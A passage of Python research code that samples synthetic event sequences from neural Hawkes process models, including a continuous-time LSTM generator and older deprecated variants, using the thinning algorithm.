) * decay_frac
)
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += ( E / intensity_hazard )
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
# for adaptive thinning,
# decrease the upper bound
# this is not used at the beginning of the project
# it is only used for sampling given pre-trained models
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
return time_current
#
#
def sample_time_for_all_type(self):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.sum(self.intensity_ub)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += ( E / intensity_hazard )
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / numpy.sum(self.intensity)
# for adaptive thinning,
# decrease the upper bound
# this is not used at the beginning of the project
# it is only used for sampling given pre-trained models
'''
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.sum(self.intensity_ub)
'''
return time_current
#
#
def sample_one_event_sep(self):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
return time_since_start_new, type_event_new
#
#
def sample_one_event_tog(self):
time_since_start_new = self.sample_time_for_all_type()
self.compute_intensity_given_past(
time_since_start_new
)
prob = self.intensity / numpy.sum(self.intensity)
type_event_new = numpy.random.choice(
range(self.dim_process), p = prob
)
return time_since_start_new, numpy.int32(type_event_new)
#
#
def sample_one_event(self):
if self.sum_for_time:
return self.sample_one_event_tog()
else:
return self.sample_one_event_sep()
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_since_start_new, type_event_new = self.sample_one_event()
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesCTLSTM(object):
'''
here is the sequence generator
using Neural Hawkes process with continuous-time LSTM
'''
def __init__(self, settings):
#
print("initializing generator ... ")
self.args = settings['args']
self.sum_for_time = settings['sum_for_time']
self.dim_float = numpy.int32(32)
if settings['path_pre_train'] == None:
print("random parameters ... ")
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
self.dim_time = self.dim_float
#
numpy.random.seed(
settings['seed_random']
)
#
#self.scale = numpy.float32(
# numpy.random.uniform(
# low = 1e-3, high = 2.0,
# size = (self.dim_process, )
# )
#)
self.scale = numpy.float32(
numpy.ones( (self.dim_process, ) )
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
2 * self.dim_model,
7 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (7 * self.dim_model, )
)
)
else:
print("read pretrained model ... ")
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.dim_model = model_pre_train['dim_model']
self.dim_time = model_pre_train['dim_time']
#
self.scale = model_pre_train['scale']
self.W_alpha = model_pre_train['W_alpha']
self.Emb_event = model_pre_train['Emb_event']
self.W_recur = model_pre_train['W_recur']
self.b_recur = model_pre_train['b_recur']
#
#
#self.intensity = numpy.copy(self.mu)
self.name = 'NeuralHawkesGenCTLSTM'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
#self.hidden_t = numpy.zeros(
# (self.dim_model, ), dtype = dtype
#)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_target = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_decay = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.gate_output = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq) )
print("initialization done ")
#
#
def set_args(self, dict_args):
self.args = dict_args
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def soft_relu_scale(self, x):
# last dim of x is dim_process
x /= self.scale
y = numpy.log(numpy.float32(1.0)+numpy.exp(x))
y *= self.scale
return y
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'scale': numpy.copy(self.scale),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
#self.hidden_t = numpy.zeros(
# (self.dim_model, ), dtype = dtype
#)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_target = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_decay = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.gate_output = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq) )
#
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
# Note : for this event, we get its type
# and time elapsed since last event
# that is to say, this func is different than
# rnn_unit in models
# THERE : event, time_since_this_event_to_next
# so first update, and then decay
# HERE : time_since_last_event, event
# so first decay, and then update
# Note : this should be called
# after one event is generated and appended
# so the state is updated accordingly
#TODO: decay
cell_t_after_decay = self.cell_target + (
self.cell_t - self.cell_target
) * numpy.exp(
-self.cell_decay * self.one_seq[-1][
'time_since_last_event'
]
)
hidden_t_after_decay = self.gate_output * numpy.tanh(
cell_t_after_decay
)
#TODO: update
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, hidden_t_after_decay),
axis = 0
), self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:4*self.dim_model]
)
# 2 -- input_bar and forget_bar gates
gate_input_target = self.sigmoid(
post_transform[4*self.dim_model:5*self.dim_model]
)
gate_forget_target = self.sigmoid(
post_transform[5*self.dim_model:6*self.dim_model]
)
# cell memory decay
cell_decay = self.soft_relu(
post_transform[6*self.dim_model:]
)
#
cell_t = gate_forget * cell_t_after_decay + gate_input * gate_pre_c
cell_target = gate_forget_target * self.cell_target + gate_input_target * gate_pre_c
#
self.cell_t = numpy.copy(cell_t)
self.cell_target = numpy.copy(cell_target)
self.cell_decay = numpy.copy(cell_decay)
self.gate_output = numpy.copy(gate_output)
#
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
time_recent = self.one_seq[-1]['time_since_start']
#
cell_t_after_decay = self.cell_target + (
self.cell_t - self.cell_target
) * numpy.exp(
-self.cell_decay * (
time_current - time_recent
)
)
hidden_t_after_decay = self.gate_output * numpy.tanh(
cell_t_after_decay
)
#
self.intensity_tilde = numpy.dot(
hidden_t_after_decay, self.W_alpha
)
self.intensity = self.soft_relu_scale(
self.intensity_tilde
)
# intensity computation is finished
#
#
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
# Note : this is very tricky !!!
# in decomposable process, finding upper bound is easy
# see B.3 in NIPS paper
# but in neural model
# it is not a combo of POSITIVE decreasing funcs
# So how to do this?
# we find the functon is a sum of temrs
# some terms are decreasing, we keep them
# some terms are increasing, we get their upper-limit
#
# In detail, we compose it to 4 parts :
# (dc = c-c_target)
# w + dc - increasing
# w + dc + decreasing
# w - dc - decreasing
# w - dc + increasing
#
time_recent = self.one_seq[-1]['time_since_start']
#
cell_gap = self.cell_t - self.cell_target
cell_gap_matrix = numpy.outer(
cell_gap, numpy.ones(
(self.dim_process, ), dtype=dtype
)
)
# dim * dim_process
index_increasing_0 = (cell_gap_matrix > 0.0) & (self.W_alpha < 0.0)
index_increasing_1 = (cell_gap_matrix < 0.0) & (self.W_alpha > 0.0)
#
cell_gap_matrix[
index_increasing_0
] = numpy.float32(0.0)
cell_gap_matrix[
index_increasing_1
] = numpy.float32(0.0)
#
cell_t_after_decay = numpy.outer(
self.cell_target, numpy.ones(
(self.dim_process, ), dtype=dtype
)
) + cell_gap_matrix * numpy.exp(
-numpy.outer(
self.cell_decay, numpy.ones(
(self.dim_process, ), dtype=dtype
)
) * (
time_current - time_recent
)
)
hidden_t_after_decay = numpy.outer(
self.gate_output, numpy.ones(
(self.dim_process, ), dtype=dtype
)
) * numpy.tanh(cell_t_after_decay)
#
self.intensity_tilde_ub = numpy.sum(
hidden_t_after_decay * self.W_alpha,
axis=0
)
self.intensity_ub = self.soft_relu_scale(
self.intensity_tilde_ub
)
#
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
#print("type is : ", type_event)
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
#print("E U time_current : ")
#print(E, U, time_current)
#print("intensity hazard is : ")
#print(intensity_hazard)
time_current += (E / intensity_hazard)
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#print("new time_current and u : ")
#print(time_current, u)
#print("intensity and upper bound is : ")
#print(self.intensity)
#print(self.intensity_ub)
# use adaptive thinning algorithm
# that is, decreasing the upper bound
# to make the sampling quicker
# use adaptive method by
# toggling on the following block
'''
self.compute_intensity_upper_bound(
time_current
)
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
'''
return time_current
#
#
#
def sample_time_for_all_type(self):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
intensity_hazard = numpy.sum(self.intensity_ub)
#
u = 1.5
while u >= 1.0:
#print("type is : ", type_event)
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
#print("E U time_current : ")
#print(E, U, time_current)
#print("intensity hazard is : ")
#print(intensity_hazard)
time_current += (E / intensity_hazard)
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / numpy.sum(self.intensity)
#print("new time_current and u : ")
#print(time_current, u)
#print("intensity and upper bound is : ")
#print(self.intensity)
#print(self.intensity_ub)
# use adaptive thinning algorithm
# that is, decreasing the upper bound
# to make the sampling quicker
# use adaptive method by
# toggling on the following block
'''
self.compute_intensity_upper_bound(
time_current
)
intensity_hazard = numpy.sum(self.intensity_ub)
'''
return time_current
#
#
#
def sample_one_event_sep(self):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
return time_since_start_new, type_event_new
#
#
def sample_one_event_tog(self):
time_since_start_new = self.sample_time_for_all_type()
self.compute_intensity_given_past(
time_since_start_new
)
prob = self.intensity / numpy.sum(self.intensity)
type_event_new = numpy.random.choice(
range(self.dim_process), p = prob
)
return time_since_start_new, numpy.int32(type_event_new)
#
#
def sample_one_event(self):
if self.sum_for_time:
return self.sample_one_event_tog()
else:
return self.sample_one_event_sep()
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in NIPS 17 Appendix
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
time_since_start_new, type_event_new = self.sample_one_event()
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
#
#
#
#
#
#
# deprecated generators
# TODO: modules below are deprecated
# they are models that we tried over this project
# most of them work, better than Hawkes baseline
# but still lose to our neural Hawkes with continuous-time LSTM
# most of them keep the decomposable structure of Hawkes
# and try to use neural networks to parametrize it
#
#
class NeuralHawkesGen(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
#
self.dim_float = numpy.int32(32)
self.dim_time = self.dim_float
#
self.args = settings['args']
numpy.random.seed(
settings['seed_random']
)
self.mu = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_process,)
)
)
#
self.delta = numpy.float32(
numpy.random.uniform(
low=10.0, high=20.0,
size=(self.dim_model, self.dim_process)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time, self.dim_model
)
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
#
#self.intensity = numpy.copy(self.mu)
self.name = 'NeuralHawkesGen'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'mu': numpy.copy(self.mu),
'delta': numpy.copy(self.delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
def compute_hidden_states(self):
# every time it is called,
# it computes the new hidden states of the LSTM
# it gets the last event in the sequence
# which is generated at t_(rec(t))
# and compute its hidden states
emb_event_t = self.Emb_event[
self.one_seq[-1]['type_event'], :
]
emb_time_t = numpy.dot(
self.float32_to_bit(
self.one_seq[-1]['time_since_last_event']
),
self.Emb_time
)
post_transform = numpy.dot(
numpy.concatenate(
(emb_event_t, emb_time_t, self.hidden_t),
axis = 0
),
self.W_recur
) + self.b_recur
#
gate_input = self.sigmoid(
post_transform[:self.dim_model]
)
gate_forget = self.sigmoid(
post_transform[self.dim_model:2*self.dim_model]
)
gate_output = self.sigmoid(
post_transform[2*self.dim_model:3*self.dim_model]
)
gate_pre_c = numpy.tanh(
post_transform[3*self.dim_model:]
)
#
cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
hidden_t_new = gate_output * numpy.tanh(cell_t_new)
self.hidden_t = numpy.copy(hidden_t_new)
self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
hidden_with_time = numpy.exp(
-self.delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + self.mu
#
self.intensity = self.soft_relu(
self.intensity_tilde
)
# intensity computation is finished
#
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
hidden_with_time = numpy.exp(
-self.delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + self.hard_relu(self.mu)
#
self.intensity_ub = self.soft_relu(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
def sample_time_given_type(self, type_event):
# type_event is the type of event for which we want to sample the time
# it is the little k in our model formulation in paper
time_current = numpy.float32(0.0)
if len(self.one_seq) > 0:
time_current = self.one_seq[-1]['time_since_start']
#
#self.compute_intensity(time_current)
self.compute_intensity_upper_bound(time_current)
#
intensity_hazard = numpy.copy(
self.intensity_ub[type_event]
)
#
u = 1.5
while u >= 1.0:
E = numpy.random.exponential(
scale=1.0, size=None
)
U = numpy.random.uniform(
low=0.0, high=1.0, size=None
)
time_current += E / intensity_hazard
self.compute_intensity_given_past(time_current)
u = U * intensity_hazard / self.intensity[type_event]
#
return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
#
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events, list_time = [], []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
print(list_events)
print(list_time)
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class GeneralizedNeuralHawkesGen(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
#
self.dim_float = numpy.int32(32)
self.dim_time = self.dim_float
#
self.args = settings['args']
numpy.random.seed(
settings['seed_random']
)
self.mu = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_process,)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high= 1.0,
size=(
self.dim_model, self.dim_model,
self.dim_process
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time, self.dim_model
)
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
#
#self.intensity = numpy.copy(self.mu)
self.name = 'GeneralizedNeuralHawkesGen'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'mu': numpy.copy(self.mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
